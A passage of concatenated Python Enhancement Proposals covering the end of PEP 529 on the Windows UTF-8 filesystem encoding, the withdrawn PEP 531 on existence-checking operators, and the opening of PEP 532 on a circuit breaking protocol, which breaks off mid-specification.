initfsencoding() to utf-8, or if the legacy-mode switch is enabled to mbcs.
Update the implementations of PyUnicode_DecodeFSDefaultAndSize() and
PyUnicode_EncodeFSDefault() to use the utf-8 codec, or if the legacy-mode
switch is enabled the existing mbcs codec.
Add sys.getfilesystemencodeerrors
As the error mode may now change between surrogatepass and replace,
Python code that manually performs encoding also needs access to the current
error mode. This includes the implementation of os.fsencode() and
os.fsdecode(), which currently assume an error mode based on the codec.
Add a public Py_FileSystemDefaultEncodeErrors, similar to the existing
Py_FileSystemDefaultEncoding. The default value on Windows will be
surrogatepass or in legacy mode, replace. The default value on all other
platforms will be surrogateescape.
Add a public sys.getfilesystemencodeerrors() function that returns the
current error mode.
Update the implementations of PyUnicode_DecodeFSDefaultAndSize() and
PyUnicode_EncodeFSDefault() to use the variable for error mode rather than
constant strings.
Update the implementations of os.fsencode() and os.fsdecode() to use
sys.getfilesystemencodeerrors() instead of assuming the mode.
Update path_converter
Update the path converter to always decode bytes or buffer objects into text
using PyUnicode_DecodeFSDefaultAndSize().
Change the narrow field from a char* string into a flag that indicates
whether the original object was bytes. This is required for functions that need
to return paths using the same type as was originally provided.
Remove unused ANSI code
Remove all code paths using the narrow field, as these will no longer be
reachable by any caller. These are only used within posixmodule.c. Other
uses of paths should have use of bytes paths replaced with decoding and use of
the *W APIs.
Add legacy mode
Add a legacy mode flag, enabled by the environment variable
PYTHONLEGACYWINDOWSFSENCODING or by a function call to
sys._enablelegacywindowsfsencoding(). The function call can only be
used to enable the flag and should be used by programs as close to
initialization as possible. Legacy mode cannot be disabled while Python is
running.
When this flag is set, the default filesystem encoding is set to mbcs rather
than utf-8, and the error mode is set to replace rather than
surrogatepass. Paths will continue to decode to wide characters and only *W
APIs will be called, however, the bytes passed in and received from Python will
be encoded the same as prior to this change.
Undeprecate bytes paths on Windows
Using bytes as paths on Windows is currently deprecated. We would announce that
this is no longer the case, and that paths when encoded as bytes should use
whatever is returned from sys.getfilesystemencoding() rather than the user’s
active code page.
Beta experiment
To assist with determining the impact of this change, we propose applying it to
3.6.0b1 provisionally with the intent being to make a final decision before
3.6.0b4.
During the experiment period, decoding and encoding exception messages will be
expanded to include a link to an active online discussion and encourage
reporting of problems.
If it is decided to revert the functionality for 3.6.0b4, the implementation
change would be to permanently enable the legacy mode flag, change the
environment variable to PYTHONWINDOWSUTF8FSENCODING and function to
sys._enablewindowsutf8fsencoding() to allow enabling the functionality
on a case-by-case basis, as opposed to disabling it.
It is expected that if we cannot feasibly make the change for 3.6 due to
compatibility concerns, it will not be possible to make the change at any later
time in Python 3.x.
Affected Modules
This PEP implicitly includes all modules within the Python that either pass path
names to the operating system, or otherwise use sys.getfilesystemencoding().
As of 3.6.0a4, the following modules require modification:
os
_overlapped
_socket
subprocess
zipimport
The following modules use sys.getfilesystemencoding() but do not need
modification:
gc (already assumes bytes are utf-8)
grp (not compiled for Windows)
http.server (correctly includes codec name with transmitted data)
idlelib.editor (should not be needed; has fallback handling)
nis (not compiled for Windows)
pwd (not compiled for Windows)
spwd (not compiled for Windows)
_ssl (only used for ASCII constants)
tarfile (code unused on Windows)
_tkinter (already assumes bytes are utf-8)
wsgiref (assumed as the default encoding for unknown environments)
zipapp (code unused on Windows)
The following native code uses one of the encoding or decoding functions, but do
not require any modification:
Parser/parsetok.c (docs already specify sys.getfilesystemencoding())
Python/ast.c (docs already specify sys.getfilesystemencoding())
Python/compile.c (undocumented, but Python filesystem encoding implied)
Python/errors.c (docs already specify os.fsdecode())
Python/fileutils.c (code unused on Windows)
Python/future.c (undocumented, but Python filesystem encoding implied)
Python/import.c (docs already specify utf-8)
Python/importdl.c (code unused on Windows)
Python/pythonrun.c (docs already specify sys.getfilesystemencoding())
Python/symtable.c (undocumented, but Python filesystem encoding implied)
Python/thread.c (code unused on Windows)
Python/traceback.c (encodes correctly for comparing strings)
Python/_warnings.c (docs already specify os.fsdecode())
Rejected Alternatives
Use strict mbcs decoding
This is essentially the same as the proposed change, but instead of changing
sys.getfilesystemencoding() to utf-8 it is changed to mbcs (which
dynamically maps to the active code page).
This approach allows the use of new functionality that is only available as *W
APIs and also detection of encoding/decoding errors. For example, rather than
silently replacing Unicode characters with ‘?’, it would be possible to warn or
fail the operation.
Compared to the proposed fix, this could enable some new functionality but does
not fix any of the problems described initially. New runtime errors may cause
some problems to be more obvious and lead to fixes, provided library maintainers
are interested in supporting Windows and adding a separate code path to treat
filesystem paths as strings.
Making the encoding mbcs without strict errors is equivalent to the legacy-mode
switch being enabled by default. This is a possible course of action if there is
significant breakage of actual code and a need to extend the deprecation period,
but still a desire to have the simplifications to the CPython source.
Make bytes paths an error on Windows
By preventing the use of bytes paths on Windows completely we prevent users from
hitting encoding issues.
However, the motivation for this PEP is to increase the likelihood that code
written on POSIX will also work correctly on Windows. This alternative would
move the other direction and make such code completely incompatible. As this
does not benefit users in any way, we reject it.
Make bytes paths an error on all platforms
By deprecating and then disable the use of bytes paths on all platforms we
prevent users from hitting encoding issues regardless of where the code was
originally written. This would require a full deprecation cycle, as there are
currently no warnings on platforms other than Windows.
This is likely to be seen as a hostile action against Python developers in
general, and as such is rejected at this time.
Code that may break
The following code patterns may break or see different behaviour as a result of
this change. Each of these examples would have been fragile in code intended for
cross-platform use. The suggested fixes demonstrate the most compatible way to
handle path encoding issues across all platforms and across multiple Python
versions.
Note that all of these examples produce deprecation warnings on Python 3.3 and
later.
Not managing encodings across boundaries
Code that does not manage encodings when crossing protocol boundaries may
currently be working by chance, but could encounter issues when either encoding
changes. Note that the source of filename may be any function that returns
a bytes object, as illustrated in a second example below:
>>> filename = open('filename_in_mbcs.txt', 'rb').read()
>>> text = open(filename, 'r').read()
To correct this code, the encoding of the bytes in filename should be
specified, either when reading from the file or before using the value:
>>> # Fix 1: Open file as text (default encoding)
>>> filename = open('filename_in_mbcs.txt', 'r').read()
>>> text = open(filename, 'r').read()
>>> # Fix 2: Open file as text (explicit encoding)
>>> filename = open('filename_in_mbcs.txt', 'r', encoding='mbcs').read()
>>> text = open(filename, 'r').read()
>>> # Fix 3: Explicitly decode the path
>>> filename = open('filename_in_mbcs.txt', 'rb').read()
>>> text = open(filename.decode('mbcs'), 'r').read()
Where the creator of filename is separated from the user of filename,
the encoding is important information to include:
>>> some_object.filename = r'C:\Users\Steve\Documents\my_file.txt'.encode('mbcs')
>>> filename = some_object.filename
>>> type(filename)
<class 'bytes'>
>>> text = open(filename, 'r').read()
To fix this code for best compatibility across operating systems and Python
versions, the filename should be exposed as str:
>>> # Fix 1: Expose as str
>>> some_object.filename = r'C:\Users\Steve\Documents\my_file.txt'
>>> filename = some_object.filename
>>> type(filename)
<class 'str'>
>>> text = open(filename, 'r').read()
Alternatively, the encoding used for the path needs to be made available to the
user. Specifying os.fsencode() (or sys.getfilesystemencoding()) is an
acceptable choice, or a new attribute could be added with the exact encoding:
>>> # Fix 2: Use fsencode
>>> some_object.filename = os.fsencode(r'C:\Users\Steve\Documents\my_file.txt')
>>> filename = some_object.filename
>>> type(filename)
<class 'bytes'>
>>> text = open(filename, 'r').read()
>>> # Fix 3: Expose as explicit encoding
>>> some_object.filename = r'C:\Users\Steve\Documents\my_file.txt'.encode('cp437')
>>> some_object.filename_encoding = 'cp437'
>>> filename = some_object.filename
>>> type(filename)
<class 'bytes'>
>>> filename = filename.decode(some_object.filename_encoding)
>>> type(filename)
<class 'str'>
>>> text = open(filename, 'r').read()
Explicitly using ‘mbcs’
Code that explicitly encodes text using ‘mbcs’ before passing to file system
APIs is now passing incorrectly encoded bytes. Note that the source of
filename in this example is not relevant, provided that it is a str:
>>> filename = open('files.txt', 'r').readline().rstrip()
>>> text = open(filename.encode('mbcs'), 'r')
To correct this code, the string should be passed without explicit encoding, or
should use os.fsencode():
>>> # Fix 1: Do not encode the string
>>> filename = open('files.txt', 'r').readline().rstrip()
>>> text = open(filename, 'r')
>>> # Fix 2: Use correct encoding
>>> filename = open('files.txt', 'r').readline().rstrip()
>>> text = open(os.fsencode(filename), 'r')
Copyright
This document has been placed in the public domain.
| Final | PEP 529 – Change Windows filesystem encoding to UTF-8 | Standards Track | Historically, Python uses the ANSI APIs for interacting with the Windows
operating system, often via C Runtime functions. However, these have been long
discouraged in favor of the UTF-16 APIs. Within the operating system, all text
is represented as UTF-16, and the ANSI APIs perform encoding and decoding using
the active code page. See Naming Files, Paths, and Namespaces for
more details. |
PEP 531 – Existence checking operators
Author:
Alyssa Coghlan <ncoghlan at gmail.com>
Status:
Withdrawn
Type:
Standards Track
Created:
25-Oct-2016
Python-Version:
3.7
Post-History:
28-Oct-2016
Table of Contents
Abstract
PEP Withdrawal
Relationship with other PEPs
Rationale
Existence checking expressions
Existence checking assignment
Existence checking protocol
Proposed symbolic notation
Proposed keywords
Risks and concerns
Readability
Magic syntax
Conceptual complexity
Design Discussion
Subtleties in chaining existence checking expressions
Ambiguous interaction with conditional expressions
Existence checking in other truth-checking contexts
Defining expected invariant relations between __bool__ and __exists__
Limitations
Arbitrary sentinel objects
Specification
Implementation
References
Copyright
Abstract
Inspired by PEP 505 and the related discussions, this PEP proposes the addition
of two new control flow operators to Python:
Existence-checking precondition (“exists-then”): expr1 ?then expr2
Existence-checking fallback (“exists-else”): expr1 ?else expr2
as well as the following abbreviations for common existence checking
expressions and statements:
Existence-checking attribute access:
obj?.attr (for obj ?then obj.attr)
Existence-checking subscripting:
obj?[expr] (for obj ?then obj[expr])
Existence-checking assignment:
value ?= expr (for value = value ?else expr)
The common ? symbol in these new operator definitions indicates that they
use a new “existence checking” protocol rather than the established
truth-checking protocol used by if statements, while loops, comprehensions,
generator expressions, conditional expressions, logical conjunction, and
logical disjunction.
This new protocol would be made available as operator.exists, with the
following characteristics:
types can define a new __exists__ magic method (Python) or
tp_exists slot (C) to override the default behaviour. This optional
method has the same signature and possible return values as __bool__.
operator.exists(None) returns False
operator.exists(NotImplemented) returns False
operator.exists(Ellipsis) returns False
float, complex and decimal.Decimal will override the existence
check such that NaN values return False and other values (including
zero values) return True
for any other type, operator.exists(obj) returns True by default. Most
importantly, values that evaluate to False in a truth checking context
(zeroes, empty containers) will still evaluate to True in an existence
checking context
PEP Withdrawal
When posting this PEP for discussion on python-ideas [4], I asked reviewers to
consider 3 high level design questions before moving on to considering the
specifics of this particular syntactic proposal:
1. Do we collectively agree that “existence checking” is a useful
general concept that exists in software development and is distinct
from the concept of “truth checking”?
2. Do we collectively agree that the Python ecosystem would benefit
from an existence checking protocol that permits generalisation of
algorithms (especially short circuiting ones) across different “data
missing” indicators, including those defined in the language
definition, the standard library, and custom user code?
3. Do we collectively agree that it would be easier to use such a
protocol effectively if existence-checking equivalents to the
truth-checking “and” and “or” control flow operators were available?
While the answers to the first question were generally positive, it quickly
became clear that the answer to the second question is “No”.
Steven D’Aprano articulated the counter-argument well in [5], but the general
idea is that when checking for “missing data” sentinels, we’re almost always
looking for a specific sentinel value, rather than any sentinel value.
NotImplemented exists, for example, due to None being a potentially
legitimate result from overloaded arithmetic operators and exception
handling imposing too much runtime overhead to be useful for operand coercion.
Similarly, Ellipsis exists for multi-dimensional slicing support due to
None already have another meaning in a slicing context (indicating the use
of the default start or stop indices, or the default step size).
In mathematics, the value of NaN is that programmatically it behaves
like a normal value of its type (e.g. exposing all the usual attributes and
methods), while arithmetically it behaves according to the mathematical rules
for handling NaN values.
With that core design concept invalidated, the proposal as a whole doesn’t
make sense, and it is accordingly withdrawn.
However, the discussion of the proposal did prompt consideration of a potential
protocol based approach to make the existing and, or and if-else
operators more flexible [6] without introducing any new syntax, so I’ll be
writing that up as another possible alternative to PEP 505.
Relationship with other PEPs
While this PEP was inspired by and builds on Mark Haase’s excellent work in
putting together PEP 505, it ultimately competes with that PEP due to
significant differences in the specifics of the proposed syntax and semantics
for the feature.
It also presents a different perspective on the rationale for the change by
focusing on the benefits to existing Python users as the typical demands of
application and service development activities are genuinely changing. It
isn’t an accident that similar features are now appearing in multiple
programming languages, and while it’s a good idea for us to learn from how other
language designers are handling the problem, precedents being set elsewhere
are more relevant to how we would go about tackling this problem than they
are to whether or not we think it’s a problem we should address in the first
place.
Rationale
Existence checking expressions
An increasingly common requirement in modern software development is the need
to work with “semi-structured data”: data where the structure of the data is
known in advance, but pieces of it may be missing at runtime, and the software
manipulating that data is expected to degrade gracefully (e.g. by omitting
results that depend on the missing data) rather than failing outright.
Some particularly common cases where this issue arises are:
handling optional application configuration settings and function parameters
handling external service failures in distributed systems
handling data sets that include some partial records
It is the latter two cases that are the primary motivation for this PEP - while
needing to deal with optional configuration settings and parameters is a design
requirement at least as old as Python itself, the rise of public cloud
infrastructure, the development of software systems as collaborative networks
of distributed services, and the availability of large public and private data
sets for analysis means that the ability to degrade operations gracefully in
the face of partial service failures or partial data availability is becoming
an essential feature of modern programming environments.
At the moment, writing such software in Python can be genuinely awkward, as
your code ends up littered with expressions like:
value1 = expr1.field.of.interest if expr1 is not None else None
value2 = expr2["field"]["of"]["interest"] if expr2 is not None else None
value3 = expr3 if expr3 is not None else expr4 if expr4 is not None else expr5
If these are only occasional, then expanding out to full statement forms may
help improve readability, but if you have 4 or 5 of them in a row (which is a
fairly common situation in data transformation pipelines), then replacing them
with 16 or 20 lines of conditional logic really doesn’t help matters.
Expanding the three examples above that way hopefully helps illustrate that:
if expr1 is not None:
value1 = expr1.field.of.interest
else:
value1 = None
if expr2 is not None:
value2 = expr2["field"]["of"]["interest"]
else:
value2 = None
if expr3 is not None:
value3 = expr3
else:
if expr4 is not None:
value3 = expr4
else:
value3 = expr5
The combined impact of the proposals in this PEP is to allow the above sample
expressions to instead be written as:
value1 = expr1?.field.of.interest
value2 = expr2?["field"]["of"]["interest"]
value3 = expr3 ?else expr4 ?else expr5
In these forms, almost all of the information presented to the reader is
immediately relevant to the question “What does this code do?”, while the
boilerplate code to handle missing data by passing it through to the output
or falling back to an alternative input, has shrunk to two uses of the ?
symbol and two uses of the ?else keyword.
In the first two examples, the 31 character boilerplate clause
if exprN is not None else None (minimally 27 characters for a single letter
variable name) has been replaced by a single ? character, substantially
improving the signal-to-pattern-noise ratio of the lines (especially if it
encourages the use of more meaningful variable and field names rather than
making them shorter purely for the sake of expression brevity).
In the last example, two instances of the 21 character boilerplate,
if exprN is not None (minimally 17 characters) are replaced with single
characters, again substantially improving the signal-to-pattern-noise ratio.
Furthermore, each of our 5 “subexpressions of potential interest” is included
exactly once, rather than 4 of them needing to be duplicated or pulled out
to a named variable in order to first check if they exist.
The existence checking precondition operator is mainly defined to provide a
clear conceptual basis for the existence checking attribute access and
subscripting operators:
obj?.attr is roughly equivalent to obj ?then obj.attr
obj?[expr] is roughly equivalent to obj ?then obj[expr]
The main semantic difference between the shorthand forms and their expanded
equivalents is that the common subexpression to the left of the existence
checking operator is evaluated only once in the shorthand form (similar to
the benefit offered by augmented assignment statements).
Existence checking assignment
Existence-checking assignment is proposed as a relatively straightforward
expansion of the concepts in this PEP to also cover the common configuration
handling idiom:
value = value if value is not None else expensive_default()
by allowing that to instead be abbreviated as:
value ?= expensive_default()
This is mainly beneficial when the target is a subscript operation or
subattribute, as even without this specific change, the PEP would still
permit this idiom to be updated to:
value = value ?else expensive_default()
The main argument against adding this form is that it’s arguably ambiguous
and could mean either:
value = value ?else expensive_default(); or
value = value ?then value.subfield.of.interest
The second form isn’t at all useful, but if this concern was deemed significant
enough to address while still keeping the augmented assignment feature,
the full keyword could be included in the syntax:
value ?else= expensive_default()
Alternatively, augmented assignment could just be dropped from the current
proposal entirely and potentially reconsidered at a later date.
Existence checking protocol
The existence checking protocol is including in this proposal primarily to
allow for proxy objects (e.g. local representations of remote resources) and
mock objects used in testing to correctly indicate non-existence of target
resources, even though the proxy or mock object itself is not None.
However, with that protocol defined, it then seems natural to expand it to
provide a type independent way of checking for NaN values in numeric types
- at the moment you need to be aware of the exact data type you’re working with
(e.g. builtin floats, builtin complex numbers, the decimal module) and use the
appropriate operation (e.g. math.isnan, cmath.isnan,
decimal.getcontext().is_nan(), respectively)
Similarly, it seems reasonable to declare that the other placeholder builtin
singletons, Ellipsis and NotImplemented, also qualify as objects that
represent the absence of data more so than they represent data.
Proposed symbolic notation
Python has historically only had one kind of implied boolean context: truth
checking, which can be invoked directly via the bool() builtin. As this PEP
proposes a new kind of control flow operation based on existence checking rather
than truth checking, it is considered valuable to have a reminder directly
in the code when existence checking is being used rather than truth checking.
The mathematical symbol for existence assertions is U+2203 ‘THERE EXISTS’: ∃
Accordingly, one possible approach to the syntactic additions proposed in this
PEP would be to use that already defined mathematical notation:
expr1 ∃then expr2
expr1 ∃else expr2
obj∃.attr
obj∃[expr]
target ∃= expr
However, there are two major problems with that approach, one practical, and
one pedagogical.
The practical problem is the usual one that most keyboards don’t offer any easy
way of entering mathematical symbols other than those used in basic arithmetic
(even the symbols appearing in this PEP were ultimately copied & pasted
from [3] rather than being entered directly).
The pedagogical problem is that the symbols for existence assertions (∃)
and universal assertions (∀) aren’t going to be familiar to most people
the way basic arithmetic operators are, so we wouldn’t actually be making the
proposed syntax easier to understand by adopting ∃.
By contrast, ? is one of the few remaining unused ASCII punctuation
characters in Python’s syntax, making it available as a candidate syntactic
marker for “this control flow operation is based on an existence check, not a
truth check”.
Taking that path would also have the advantage of aligning Python’s syntax
with corresponding syntax in other languages that offer similar features.
Drawing from the existing summary in PEP 505 and the Wikipedia articles on
the “safe navigation operator [1] and the “null coalescing operator” [2],
we see:
The ?. existence checking attribute access syntax precisely aligns with:
the “safe navigation” attribute access operator in C# (?.)
the “optional chaining” operator in Swift (?.)
the “safe navigation” attribute access operator in Groovy (?.)
the “conditional member access” operator in Dart (?.)
The ?[] existence checking attribute access syntax precisely aligns with:
the “safe navigation” subscript operator in C# (?[])
the “optional subscript” operator in Swift (?[].)
The ?else existence checking fallback syntax semantically aligns with:
the “null-coalescing” operator in C# (??)
the “null-coalescing” operator in PHP (??)
the “nil-coalescing” operator in Swift (??)
To be clear, these aren’t the only spelling of these operators used in other
languages, but they’re the most common ones, and the ? symbol is the most
common syntactic marker by far (presumably prompted by the use of ? to
introduce the “then” clause in C-style conditional expressions, which many
of these languages also offer).
Proposed keywords
Given the symbolic marker ?, it would be syntactically unambiguous to spell
the existence checking precondition and fallback operations using the same
keywords as their truth checking counterparts:
expr1 ?and expr2 (instead of expr1 ?then expr2)
expr1 ?or expr2 (instead of expr1 ?else expr2)
However, while syntactically unambiguous when written, this approach makes
the code incredibly hard to pronounce (What’s the pronunciation of “?”?) and
also hard to describe (given reused keywords, there’s no obvious shorthand
terms for “existence checking precondition (?and)” and “existence checking
fallback (?or)” that would distinguish them from “logical conjunction (and)”
and “logical disjunction (or)”).
We could try to encourage folks to pronounce the ? symbol as “exists”,
making the shorthand names the “exists-and expression” and the
“exists-or expression”, but there’d be no way of guessing those names purely
from seeing them written in a piece of code.
Instead, this PEP takes advantage of the proposed symbolic syntax to introduce
a new keyword (?then) and borrow an existing one (?else) in a way
that allows people to refer to “then expressions” and “else expressions”
without ambiguity.
These keywords also align well with the conditional expressions that are
semantically equivalent to the proposed expressions.
For ?else expressions, expr1 ?else expr2 is equivalent to:
_lhs_result = expr1
_lhs_result if operator.exists(_lhs_result) else expr2
Here the parallel is clear, since the else expr2 appears at the end of
both the abbreviated and expanded forms.
For ?then expressions, expr1 ?then expr2 is equivalent to:
_lhs_result = expr1
expr2 if operator.exists(_lhs_result) else _lhs_result
Here the parallel isn’t as immediately obvious due to Python’s traditionally
anonymous “then” clauses (introduced by : in if statements and suffixed
by if in conditional expressions), but it’s still reasonably clear as long
as you’re already familiar with the “if-then-else” explanation of conditional
control flow.
Risks and concerns
Readability
Learning to read and write the new syntax effectively mainly requires
internalising two concepts:
expressions containing ? include an existence check and may short circuit
if None or another “non-existent” value is an expected input, and the
correct handling is to propagate that to the result, then the existence
checking operators are likely what you want
Currently, these concepts aren’t explicitly represented at the language level,
so it’s a matter of learning to recognise and use the various idiomatic
patterns based on conditional expressions and statements.
Magic syntax
There’s nothing about ? as a syntactic element that inherently suggests
is not None or operator.exists. The main current use of ? as a
symbol in Python code is as a trailing suffix in IPython environments to
request help information for the result of the preceding expression.
However, the notion of existence checking really does benefit from a pervasive
visual marker that distinguishes it from truth checking, and that calls for
a single-character symbolic syntax if we’re going to do it at all.
Conceptual complexity
This proposal takes the currently ad hoc and informal concept of “existence
checking” and elevates it to the status of being a syntactic language feature
with a clearly defined operator protocol.
In many ways, this should actually reduce the overall conceptual complexity
of the language, as many more expectations will map correctly between truth
checking with bool(expr) and existence checking with
operator.exists(expr) than currently map between truth checking and
existence checking with expr is not None (or expr is not NotImplemented
in the context of operand coercion, or the various NaN-checking operations
in mathematical libraries).
As a simple example of the new parallels introduced by this PEP, compare:
all_are_true = all(map(bool, iterable))
at_least_one_is_true = any(map(bool, iterable))
all_exist = all(map(operator.exists, iterable))
at_least_one_exists = any(map(operator.exists, iterable))
Design Discussion
Subtleties in chaining existence checking expressions
Similar subtleties arise in chaining existence checking expressions as already
exist in chaining logical operators: the behaviour can be surprising if the
right hand side of one of the expressions in the chain itself returns a
value that doesn’t exist.
As a result, value = arg1 ?then f(arg1) ?else default() would be dubious for
essentially the same reason that value = cond and expr1 or expr2 is dubious:
the former will evaluate default() if f(arg1) returns None, just
as the latter will evaluate expr2 if expr1 evaluates to False in
a boolean context.
Ambiguous interaction with conditional expressions
In the proposal as currently written, the following is a syntax error:
value = f(arg) if arg ?else default
While the following is a valid operation that checks a second condition if the
first doesn’t exist rather than merely being false:
value = expr1 if cond1 ?else cond2 else expr2
The expression chaining problem described above means that the argument can be
made that the first operation should instead be equivalent to:
value = f(arg) if operator.exists(arg) else default
requiring the second to be written in the arguably clearer form:
value = expr1 if (cond1 ?else cond2) else expr2
Alternatively, the first form could remain a syntax error, and the existence
checking symbol could instead be attached to the if keyword:
value = expr1 if? cond else expr2
Existence checking in other truth-checking contexts
The truth-checking protocol is currently used in the following syntactic
constructs:
logical conjunction (and-expressions)
logical disjunction (or-expressions)
conditional expressions (if-else expressions)
if statements
while loops
filter clauses in comprehensions and generator expressions
In the current PEP, switching from truth-checking with and and or to
existence-checking is a matter of substituting in the new keywords, ?then
and ?else in the appropriate places.
For other truth-checking contexts, it proposes either importing and
using the operator.exists API, or else continuing with the current idiom
of checking specifically for expr is not None (or the context appropriate
equivalent).
The simplest possible enhancement in that regard would be to elevate the
proposed exists() API from an operator module function to a new builtin
function.
Alternatively, the ? existence checking symbol could be supported as a
modifier on the if and while keywords to indicate the use of an
existence check rather than a truth check.
However, it isn’t at all clear that the potential consistency benefits gained
for either suggestion would justify the additional disruption, so they’ve
currently been omitted from the proposal.
Defining expected invariant relations between __bool__ and __exists__
The PEP currently leaves the definition of __bool__ on all existing types
unmodified, which ensures the entire proposal remains backwards compatible,
but results in the following cases where bool(obj) returns True, but
the proposed operator.exists(obj) would return False:
NaN values for float, complex, and decimal.Decimal
Ellipsis
NotImplemented
The main argument for potentially changing these is that it becomes easier to
reason about potential code behaviour if we have a recommended invariant in
place saying that values which indicate they don’t exist in an existence
checking context should also report themselves as being False in a truth
checking context.
Failing to define such an invariant would lead to arguably odd outcomes like
float("NaN") ?else 0.0 returning 0.0 while float("NaN") or 0.0
returns NaN.
Limitations
Arbitrary sentinel objects
This proposal doesn’t attempt to provide syntactic support for the “sentinel
object” idiom, where None is a permitted explicit value, so a
separate sentinel object is defined to indicate missing values:
_SENTINEL = object()
def f(obj=_SENTINEL):
return obj if obj is not _SENTINEL else default_value()
This could potentially be supported at the expense of making the existence
protocol definition significantly more complex, both to define and to use:
at the Python layer, operator.exists and __exists__ implementations
would return the empty tuple to indicate non-existence, and otherwise return
a singleton tuple containing a reference to the object to be used as the
result of the existence check
at the C layer, tp_exists implementations would return NULL to indicate
non-existence, and otherwise return a PyObject * pointer as the
result of the existence check
Given that change, the sentinel object idiom could be rewritten as:
class Maybe:
SENTINEL = object()
def __init__(self, value):
self._result = (value,) is value is not self.SENTINEL else ()
def __exists__(self):
return self._result
def f(obj=Maybe.SENTINEL):
return Maybe(obj) ?else default_value()
However, I don’t think cases where the 3 proposed standard sentinel values (i.e.
None, Ellipsis and NotImplemented) can’t be used are going to be
anywhere near common enough for the additional protocol complexity and the loss
of symmetry between __bool__ and __exists__ to be worth it.
Specification
The Abstract already gives the gist of the proposal and the Rationale gives
some specific examples. If there’s enough interest in the basic idea, then a
full specification will need to provide a precise correspondence between the
proposed syntactic sugar and the underlying conditional expressions that is
sufficient to guide the creation of a reference implementation.
…TBD…
Implementation
As with PEP 505, actual implementation has been deferred pending in-principle
interest in the idea of adding these operators - the implementation isn’t
the hard part of these proposals, the hard part is deciding whether or not
this is a change where the long term benefits for new and existing Python users
outweigh the short term costs involved in the wider ecosystem (including
developers of other implementations, language curriculum developers, and
authors of other Python related educational material) adjusting to the change.
…TBD…
References
[1]
Wikipedia: Safe navigation operator
(https://en.wikipedia.org/wiki/Safe_navigation_operator)
[2]
Wikipedia: Null coalescing operator
(https://en.wikipedia.org/wiki/Null_coalescing_operator)
[3]
FileFormat.info: Unicode Character ‘THERE EXISTS’ (U+2203)
(http://www.fileformat.info/info/unicode/char/2203/index.htm)
[4]
python-ideas discussion thread
(https://mail.python.org/pipermail/python-ideas/2016-October/043415.html)
[5]
Steven D’Aprano’s critique of the proposal
(https://mail.python.org/pipermail/python-ideas/2016-October/043453.html)
[6]
Considering a link to the idea of overloadable Boolean operators
(https://mail.python.org/pipermail/python-ideas/2016-October/043447.html)
Copyright
This document has been placed in the public domain under the terms of the
CC0 1.0 license: https://creativecommons.org/publicdomain/zero/1.0/
| Withdrawn | PEP 531 – Existence checking operators | Standards Track | Inspired by PEP 505 and the related discussions, this PEP proposes the addition
of two new control flow operators to Python: |
PEP 532 – A circuit breaking protocol and binary operators
Author:
Alyssa Coghlan <ncoghlan at gmail.com>,
Mark E. Haase <mehaase at gmail.com>
Status:
Deferred
Type:
Standards Track
Created:
30-Oct-2016
Python-Version:
3.8
Post-History:
05-Nov-2016
Table of Contents
PEP Deferral
Abstract
Relationship with other PEPs
PEP 531: Existence checking protocol
PEP 505: None-aware operators
PEP 335: Overloadable Boolean operators
PEP 535: Rich comparison chaining
Specification
The circuit breaking protocol (if-else)
Circuit breaking operators (binary if and binary else)
Overloading logical inversion (not)
Forcing short-circuiting behaviour
Circuit breaking identity comparisons (is and is not)
Truth checking comparisons
None-aware operators
Rich chained comparisons
Other conditional constructs
Style guide recommendations
Rationale
Adding new operators
Naming the operator and protocol
Using existing keywords
Naming the protocol methods
Making binary if right-associative
Naming the standard circuit breakers
Risks and concerns
Design Discussion
Protocol walk-through
Respecting De Morgan’s Laws
Arbitrary sentinel objects
Implicitly defined circuit breakers in circuit breaking expressions
Implementation
Acknowledgements
References
Copyright
PEP Deferral
Further consideration of this PEP has been deferred until Python 3.8 at the
earliest.
Abstract
Inspired by PEP 335, PEP 505, PEP 531, and the related discussions, this PEP
proposes the definition of a new circuit breaking protocol (using the
method names __then__ and __else__) that provides a common underlying
semantic foundation for:
conditional expressions: LHS if COND else RHS
logical conjunction: LHS and RHS
logical disjunction: LHS or RHS
the None-aware operators proposed in PEP 505
the rich comparison chaining model proposed in PEP 535
Taking advantage of the new protocol, it further proposes that the definition
of conditional expressions be revised to also permit the use of if and
else respectively as right-associative and left-associative general
purpose short-circuiting operators:
Right-associative short-circuiting: LHS if RHS
Left-associative short-circuiting: LHS else RHS
In order to make logical inversion (not EXPR) consistent with the above
changes, it also proposes the introduction of a new logical inversion protocol
(using the method name __not__).
To force short-circuiting of a circuit breaker without having to evaluate
the expression creating it twice, a new operator.short_circuit(obj)
helper function will be added to the operator module.
Finally, a new standard types.CircuitBreaker type is proposed to decouple
an object’s truth value (as used to determine control flow) from the value
it returns from short-circuited circuit breaking expressions, with the
following factory functions added to the operator module to represent
particularly common switching idioms:
switching on bool(obj): operator.true(obj)
switching on not bool(obj): operator.false(obj)
switching on obj is value: operator.is_sentinel(obj, value)
switching on obj is not value: operator.is_not_sentinel(obj, value)
Relationship with other PEPs
This PEP builds on an extended history of work in other proposals. Some of
the key proposals are discussed below.
PEP 531: Existence checking protocol
This PEP is a direct successor to PEP 531, replacing the existence checking
protocol and the new ?then and ?else syntactic operators defined there
with the new circuit breaking protocol and adjustments to conditional
expressions and the not operator.
PEP 505: None-aware operators
This PEP complements the None-aware operator proposals in PEP 505, by offering
an underlying protocol-driven semantic framework that explains their
short-circuiting behaviour as highly optimised syntactic sugar for particular
uses of conditional expressions.
Given the changes proposed by this PEP:
LHS ?? RHS would roughly be is_not_sentinel(LHS, None) else RHS
EXPR?.attr would roughly be EXPR.attr if is_not_sentinel(EXPR, None)
EXPR?[key] would roughly be EXPR[key] if is_not_sentinel(EXPR, None)
In all three cases, the dedicated syntactic form would be optimised to avoid
actually creating the circuit breaker instance and instead implement the
underlying control flow directly. In the latter two cases, the syntactic form
would also avoid evaluating EXPR twice.
This means that while the None-aware operators would remain highly specialised
and specific to None, other sentinel values would still be usable through the
more general protocol-driven proposal in this PEP.
PEP 335: Overloadable Boolean operators
PEP 335 proposed the ability to overload the short-circuiting and and
or operators directly, with the ability to overload the semantics of
comparison chaining being one of the consequences of that change. The
proposal in an earlier version of this PEP to instead handle the element-wise
comparison use case by changing the semantic definition of comparison chaining
is drawn directly from Guido’s rejection of PEP 335 [1].
However, initial feedback on this PEP indicated that the number of different
proposals that it covered made it difficult to read, so that part of the
proposal has been separated out as PEP 535.
PEP 535: Rich comparison chaining
As noted above, PEP 535 is a proposal to build on the circuit breaking protocol
defined in this PEP in order to expand the rich comparison support introduced
in PEP 207 to also handle comparison chaining operations like
LEFT_BOUND < VALUE < RIGHT_BOUND.
Specification
The circuit breaking protocol (if-else)
Conditional expressions (LHS if COND else RHS) are currently interpreted
as an expression level equivalent to:
if COND:
